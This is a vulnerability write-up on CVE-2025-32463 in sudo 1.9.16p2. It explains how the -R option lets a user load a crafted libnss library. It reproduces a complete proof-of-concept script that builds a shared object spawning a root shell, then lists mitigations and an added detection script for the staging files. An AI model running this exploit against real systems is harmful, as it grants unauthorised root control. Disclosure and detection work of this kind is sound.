CVE-2025-32463: Sudo Local Privilege Escalation
Sudo 1.9.16p2 – CVE-2025-32463 Local Privilege Escalation Exploit
Vulnerability Summary
This write-up walks through exploiting CVE-2025-32463, a local privilege-escalation flaw, using Rich Mirch’s sudo-chwoot.sh PoC. The bug lives in sudo’s -R (alternative root directory) option, which sidesteps several safety checks. By manipulating how libnss is loaded inside an attacker-controlled directory, a low-privileged user can spawn a root shell.

Target Environment
Distribution: Kali Linux 6.12.25
Sudo Version: 1.9.16p2
Security Updates: Disabled
User Privileges: Limited sudo access via -R flag
How the Exploit Works
1. libnss Manipulation
When sudo runs, it consults libnss (Name Service Switch) libraries to resolve user information. Normally these load from system paths like /lib/x86_64-linux-gnu/. With sudo -R, the root directory is changed (chroot-like environment) and libnss is then sought relative to that new root.
2. Execution via constructor
The exploit produces a shared object named libnss_woot1337.so.2. A constructor function inside it runs automatically the moment the library is loaded:
```c
__attribute__((constructor)) void woot(void) {
    setreuid(0,0);
    setregid(0,0);
    chdir("/");
    execl("/bin/bash", "/bin/bash", NULL);
}
```
The constructor sets the real and effective UID and GID to 0 (root), changes directory to /, and replaces the process with /bin/bash, which therefore runs with root privileges.
3. Triggering with sudo -R
```bash
sudo -R woot woot
```
This treats woot as the new root (/) and tries to load libnss_woot1337.so.2 from there. The exploit fires and the user lands in a root shell.
Exploit Code
```bash
#!/bin/bash
# CVE-2025-32463 – Sudo EoP Exploit PoC
STAGE=$(mktemp -d /tmp/sudowoot.stage.XXXXXX)
cd ${STAGE?} || exit 1
cat > woot1337.c <<EOF
#include <stdlib.h>
#include <unistd.h>
__attribute__((constructor)) void woot(void) {
    setreuid(0,0);
    setregid(0,0);
    chdir("/");
    execl("/bin/bash", "/bin/bash", NULL);
}
EOF
mkdir -p woot/etc libnss_
echo "passwd: /woot1337" > woot/etc/nsswitch.conf
cp /etc/group woot/etc
gcc -shared -fPIC -Wl,-init,woot -o libnss_/woot1337.so.2 woot1337.c
echo "woot!"
sudo -R woot woot
rm -rf ${STAGE?}
```
Proof of Concept
Running the script drops us into a shell, and id confirms root privileges.

Technical Details
- While running, sudo loads libnss libraries relative to the root directory (/).
- The -R flag points that root at an attacker-controlled directory, allowing custom libraries to be loaded.
- Once the library loads, its constructor block runs.
- That code spawns a shell with root privileges, handing the user full system control.
Mitigation
Recommendations:
- Update sudo to a patched version.
- Restrict users from invoking sudo -R (alternative root directory).
- Don’t trust external paths during NSS loading; enforce hardened paths and library validation.
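A defender-side check for the staging layout the PoC above creates, as an added example that is not part of the original write-up or of the PoC: it flags any nsswitch.conf whose source name contains a slash and any shared object inside a directory named libnss_. The function names and the directories in the usage comment are assumptions.

```sh
#!/bin/sh
# Added defensive example, not part of the original write-up or PoC.
# Looks for the two artifacts the script above stages:
#   1. an etc/nsswitch.conf whose source name contains "/" (PoC: "passwd: /woot1337")
#   2. a shared object inside a directory literally named "libnss_"
# Legitimate NSS sources are bare names (files, dns, systemd, ...) and legitimate
# modules are files named libnss_<name>.so.2, so neither pattern occurs normally.

# check_nsswitch FILE: print one finding per NSS source that contains a slash.
check_nsswitch() {
    awk '
        { sub(/#.*/, "") }                       # strip comments
        /^[ \t]*[A-Za-z_]+:/ {
            sub(/^[ \t]*/, "")
            db = substr($0, 1, index($0, ":") - 1)
            n = split(substr($0, index($0, ":") + 1), src, /[ \t]+/)
            for (i = 1; i <= n; i++)
                if (index(src[i], "/") > 0)
                    printf "path-like NSS source: %s -> %s in %s\n", db, src[i], FILENAME
        }' "$1"
}

# scan_nss_staging DIR...: walk the given trees and print every finding.
# Paths containing newlines are not handled.
scan_nss_staging() {
    find "$@" -xdev -type f \
        \( -path '*/etc/nsswitch.conf' -o -path '*/libnss_/*.so*' \) 2>/dev/null |
    while IFS= read -r f; do
        case "$f" in
            */nsswitch.conf) check_nsswitch "$f" ;;
            *) printf 'shared object under libnss_/: %s\n' "$f" ;;
        esac
    done
}

# Typical use (directories are an assumption; pick the user-writable ones you have):
#   sh scan.sh /tmp /var/tmp /dev/shm /home
if [ "$#" -gt 0 ]; then
    scan_nss_staging "$@"
fi
```

The PoC deletes its staging directory when the shell exits, so run this periodically or pair it with process auditing for sudo invocations that use -R.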
Conclusion
This vulnerability allows trivial root acquisition by abusing system configuration weaknesses. Lack of proper isolation around core components like libnss and missing safeguards around sudo -R together produced this gap. System administrators should carefully scope user privileges and routinely audit sudo configurations.